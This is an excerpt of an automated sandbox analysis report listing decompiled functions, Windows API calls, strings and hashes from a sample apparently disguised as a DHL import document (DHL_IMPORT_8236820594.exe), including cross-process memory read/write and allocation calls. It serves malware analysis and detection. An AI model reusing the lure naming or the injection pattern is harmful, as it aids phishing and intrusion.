Instruction Fuzzy Hash: 3A0167305007049BEB215B14ED8EFD57FB8BB10B05F00055DA547610E1EBF46D889B91

Function 005122A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005122BE

Part of subcall function 005129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000), ref: 005129DE
Part of subcall function 005129C8: GetLastError.KERNEL32(00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000,00000000), ref: 005129F0

_free.LIBCMT ref: 005122D0
_free.LIBCMT ref: 005122E3
_free.LIBCMT ref: 005122F4
_free.LIBCMT ref: 00512305

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6a2b74181823597d71d73bfee54a64d1b7eebaeb8d3ec43936faf7481f179e10
Instruction ID: 3fc3647e67fbcdab291cc455198d14e79c9f6146bd170d2e8f3c9ea76e524b8d
Opcode Fuzzy Hash: 6a2b74181823597d71d73bfee54a64d1b7eebaeb8d3ec43936faf7481f179e10
Instruction Fuzzy Hash: 32F030799005128B9792AF58BC0589D7F64F739760B401B06F418D62B1C73464F5BBA8

Function 004F95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004F95D4
StrokeAndFillPath.GDI32(?,?,005371F7,00000000,?,?,?), ref: 004F95F0
SelectObject.GDI32(?,00000000), ref: 004F9603
DeleteObject.GDI32 ref: 004F9616
StrokePath.GDI32(?), ref: 004F9631

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 6cde43eb08b3cf7c42e1d236c37bd77eb1de9520381a6cd454586e5a567da70c
Instruction ID: 2dc0812fd5b411be88e7701260ef131d67b8617568253da15b07655a0d6b30f0
Opcode Fuzzy Hash: 6cde43eb08b3cf7c42e1d236c37bd77eb1de9520381a6cd454586e5a567da70c
Instruction Fuzzy Hash: 5FF08C31005A48EBDBA64F24EC2CBB93F65EB20322F408318F529951F0C7349999FF68

Function 00510F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 005110F9
__freea.LIBCMT ref: 00511117

Part of subcall function 00511537: _free.LIBCMT ref: 0051154F

Strings

a/p, xrefs: 005111DE
am/pm, xrefs: 0051117A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: a72e06a2716303ef0ecedc7b036d535a46803a8f512ea43c1d920f7c0eaad4c7
Instruction ID: cad2a3e439011b341a5768e3bdaf050f7d4ec120a5e52ad38cfb94c5016411fd
Opcode Fuzzy Hash: a72e06a2716303ef0ecedc7b036d535a46803a8f512ea43c1d920f7c0eaad4c7
Instruction Fuzzy Hash: F3D1D235900A06DBEB249F68C859BFABFB1FF05300F240999EB219B654D3759DC0CB99

Function 005661D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00500242: EnterCriticalSection.KERNEL32(005B070C,005B1884,?,?,004F198B,005B2518,?,?,?,004E12F9,00000000), ref: 0050024D
Part of subcall function 00500242: LeaveCriticalSection.KERNEL32(005B070C,?,004F198B,005B2518,?,?,?,004E12F9,00000000), ref: 0050028A

Part of subcall function 005000A3: __onexit.LIBCMT ref: 005000A9

__Init_thread_footer.LIBCMT ref: 00566238

Part of subcall function 005001F8: EnterCriticalSection.KERNEL32(005B070C,?,?,004F8747,005B2514), ref: 00500202
Part of subcall function 005001F8: LeaveCriticalSection.KERNEL32(005B070C,?,004F8747,005B2514), ref: 00500235

Part of subcall function 0055359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005535E4
Part of subcall function 0055359C: LoadStringW.USER32(005B2390,?,00000FFF,?), ref: 0055360A

Strings

x#[, xrefs: 0056636F
x#[, xrefs: 0056633A
x#[, xrefs: 00566353

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#[$x#[$x#[
API String ID: 1072379062-552198172
Opcode ID: 84bbdfaa364ee5aea4bf548b8aa3947191daa0bb9d0dc7add9380126b2861413
Instruction ID: 428f2048186e9654215cab33dba1723cef3c448f4e012832c3fd87e7edb77186
Opcode Fuzzy Hash: 84bbdfaa364ee5aea4bf548b8aa3947191daa0bb9d0dc7add9380126b2861413
Instruction Fuzzy Hash: B8C18F71A00109AFCB24DF59C895EBEBBB9FF58304F10846AF905AB291DB74ED45CB90

Function 00515AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JON, xrefs: 00515BA8, 00515C6C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: JON
API String ID: 0-1690955353
Opcode ID: 923c6f48671c1caf6dc5c18ae14ae555b6d5fbddeb46aa7a5a4463a2d93828d6
Instruction ID: fdcae48c1617fc2723acae85908b5d0e388393aff1f93015c79bd036c1f4ae3f
Opcode Fuzzy Hash: 923c6f48671c1caf6dc5c18ae14ae555b6d5fbddeb46aa7a5a4463a2d93828d6
Instruction Fuzzy Hash: DD51CE75A04A0ADFEB209FA4C849AEEBFB8BFC5314F140419F405A7291E6709D81DBA1

Function 00518A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00518B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00518B7A
__dosmaperr.LIBCMT ref: 00518B81

Strings

.P, xrefs: 00518A63

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .P
API String ID: 2434981716-3268218682
Opcode ID: 3d8aa3995dd60e9c35e1aaf262663ad84a12256e7631632f985b8f6d31538f54
Instruction ID: 3802c5806de78503efe9f9d0e97381769d3ba65e1fd1f992659f1bf3584764f6
Opcode Fuzzy Hash: 3d8aa3995dd60e9c35e1aaf262663ad84a12256e7631632f985b8f6d31538f54
Instruction Fuzzy Hash: D9416C74608045AFEB349F24CC84AFD7FA5FF86314F2845A9F48587642DE319C829790

Function 00542716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0054B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005421D0,?,?,00000034,00000800,?,00000034), ref: 0054B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00542760

Part of subcall function 0054B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0054B3F8

Part of subcall function 0054B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0054B355
Part of subcall function 0054B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00542194,00000034,?,?,00001004,00000000,00000000), ref: 0054B365
Part of subcall function 0054B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00542194,00000034,?,?,00001004,00000000,00000000), ref: 0054B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005427CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0054281A

Strings

@, xrefs: 00542832

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 9778ef2d2b76d33d4e0d894f3ecaa028523a85b3ce6a2d4a5fb2884465dff896
Instruction ID: 7159b3ad07625dca67c7ea4f1629afd801f8db5d44e3de914bf4470773ec368e
Opcode Fuzzy Hash: 9778ef2d2b76d33d4e0d894f3ecaa028523a85b3ce6a2d4a5fb2884465dff896
Instruction Fuzzy Hash: EA414F72900219AFDB10DFA4CD85ADEBBB8FF45304F104499FA55B7181DB70AE85DB60

Function 0051172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe,00000104), ref: 00511769
_free.LIBCMT ref: 00511834
_free.LIBCMT ref: 0051183E

Strings

C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, xrefs: 00511760, 00511767, 00511796, 005117CE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
API String ID: 2506810119-655734387
Opcode ID: 24d7e8cabd9d3d10a544b450a8dca7b9066e8bbf6907f539ef3f517b1b24269f
Instruction ID: 42dfd15b827ee55a1c38148423cf94e378f1b2ba526a1074c8d6efc9e1b8474c
Opcode Fuzzy Hash: 24d7e8cabd9d3d10a544b450a8dca7b9066e8bbf6907f539ef3f517b1b24269f
Instruction Fuzzy Hash: 2C31BD75A00A09BBEB21DF999884DDEBFFCFB95310F1041A6E90497251D6709E80CB98

Function 0054C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0054C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0054C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005B1990,00C25C08), ref: 0054C395

Strings

0, xrefs: 0054C2DF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 97f91d656a7bd5f1adefda82b46781c5e24102f5440c2057fded6d01edeea7b4
Instruction ID: 7bcea7f0a8b7ed23ac67d14b7f651ddf04c82061521afd65d56087323a98d5c2
Opcode Fuzzy Hash: 97f91d656a7bd5f1adefda82b46781c5e24102f5440c2057fded6d01edeea7b4
Instruction Fuzzy Hash: B3418C312063029FD724DF25D884B9ABFE4BFC5328F108A5EF9A5972D1D770A904CB62

Function 00574416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0057CC08,00000000,?,?,?,?), ref: 005744AA
GetWindowLongW.USER32 ref: 005744C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005744D7

Strings

SysTreeView32, xrefs: 0057447C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b8aa87b09ea2a7d2bd795db5ff1a71c71e7ae405a9efc5915db4a523830cd619
Instruction ID: 6a5fd5b91657e2ac471b6df7904a8a5619fe8d98c071511ff364b4c6aa2c7d78
Opcode Fuzzy Hash: b8aa87b09ea2a7d2bd795db5ff1a71c71e7ae405a9efc5915db4a523830cd619
Instruction Fuzzy Hash: 5F317231210605AFDF119E38EC45BEA7BA9FB08338F248719F979921D0D775EC51AB50

Function 00546E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00546EED
VariantCopyInd.OLEAUT32(?,?), ref: 00546F08
VariantClear.OLEAUT32(?), ref: 00546F12

Strings

*jT, xrefs: 00546E8B, 00546E90, 00546EF8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jT
API String ID: 2173805711-965676260
Opcode ID: f9f579caf08af3eb616bfffea6f1405756105aa998248baf45479f55021900c3
Instruction ID: 565d61d4af2b47051c08a8e22070d5229d471e070c0223c775043632fb9af9ba
Opcode Fuzzy Hash: f9f579caf08af3eb616bfffea6f1405756105aa998248baf45479f55021900c3
Instruction Fuzzy Hash: 5831D371604245EFCB04AF65E890AFE3B76FF8230DB10089DF9824B2A1C7349959DBD6

Function 0056304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0056335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00563077,?,?), ref: 00563378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0056307A
_wcslen.LIBCMT ref: 0056309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00563106

Strings

255.255.255.255, xrefs: 00563095, 0056309A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 06659c8b679f97c94a751cb8ad43ba550fe3dce9983c86f560082c4cf3436d9a
Instruction ID: b77cda2dc84129b4c4797c93f7a6e39865f337e324045746d275c826c33f88ee
Opcode Fuzzy Hash: 06659c8b679f97c94a751cb8ad43ba550fe3dce9983c86f560082c4cf3436d9a
Instruction Fuzzy Hash: 8431E7356042019FC720CF29C589E697FE0FF55328F248459E9158B3A2D772DF89C761

Function 00574653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00574705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00574713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0057471A

Strings

msctls_updown32, xrefs: 00574684

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: af2549dd5c97649d8a92546f71b081d1c528c12377bf60dc808006911f5a7bba
Instruction ID: f5d26093b7ff511ac788892e6836a34ff7ce70cb68b6940b32e70d252294e158
Opcode Fuzzy Hash: af2549dd5c97649d8a92546f71b081d1c528c12377bf60dc808006911f5a7bba
Instruction Fuzzy Hash: A62181B5600209AFDB10DF64ECD5DA73BADFB9A398B004149F6049B251C730EC12EA60

Function 005495AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0054961D

Strings

#notrayicon, xrefs: 005495B7
#requireadmin, xrefs: 005495D9
#OnAutoItStartRegister, xrefs: 005495F3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: c0950ddbe6a7c4b66202f30d0436373d9465d1ae62cca42d140a89f96e1c7d73
Instruction ID: fe9a7114bddff431270e48b6b3107dbce0d77a48c511624637aed7c9521d782c
Opcode Fuzzy Hash: c0950ddbe6a7c4b66202f30d0436373d9465d1ae62cca42d140a89f96e1c7d73
Instruction Fuzzy Hash: 2221357220425166C331AA25EC07FFB7B98BF91328F10842AF94997081EB55AD85C3D5

Function 005737B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00573840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00573850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00573876

Strings

Listbox, xrefs: 0057380F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 23192e635e4e6b8f9c690f947604c108a15e0b04a9cf29cb3614fea033753294
Instruction ID: 0147ed2919f0991ce58afc7116d56aa11e4a64547c50833b60c203084a10cf56
Opcode Fuzzy Hash: 23192e635e4e6b8f9c690f947604c108a15e0b04a9cf29cb3614fea033753294
Instruction Fuzzy Hash: B921F272600118BBEF118F54EC84FBB3B6EFF89760F108128F9089B190C671DD52A7A0

Function 005549F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00554A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00554A5C
SetErrorMode.KERNEL32(00000000,?,?,0057CC08), ref: 00554AD0

Strings

%lu, xrefs: 00554A6F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 299d376009a3203d4606551e149634d4b51c0de55d39a260a5f6895ab2091ad4
Instruction ID: e95ea63c7071e16f84bdcb82b5ce5d6f2d5a58479b68b45baad2d9a87a9254a0
Opcode Fuzzy Hash: 299d376009a3203d4606551e149634d4b51c0de55d39a260a5f6895ab2091ad4
Instruction Fuzzy Hash: A4318E70A00209AFDB10DF65C885EAA7BF8FF08308F1480A9F809DB252D775ED85CB61

Function 005741EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0057424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00574264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00574271

Strings

msctls_trackbar32, xrefs: 00574226

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
